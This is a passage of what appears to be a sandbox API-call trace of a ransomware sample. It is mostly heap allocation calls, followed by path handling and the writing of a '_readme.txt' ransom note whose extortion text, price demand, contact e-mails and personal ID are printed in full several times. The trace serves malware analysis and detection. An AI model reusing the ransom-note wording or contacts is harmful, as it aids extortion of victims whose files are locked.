Flags=0x0, Size=0x820) returned 0x3b15070 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.883] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0200.883] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.883] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.883] PathFindFileNameW (pszPath="") returned="" [0200.883] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.884] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.884] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.884] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0200.884] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0200.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.884] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0200.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.884] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.884] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for 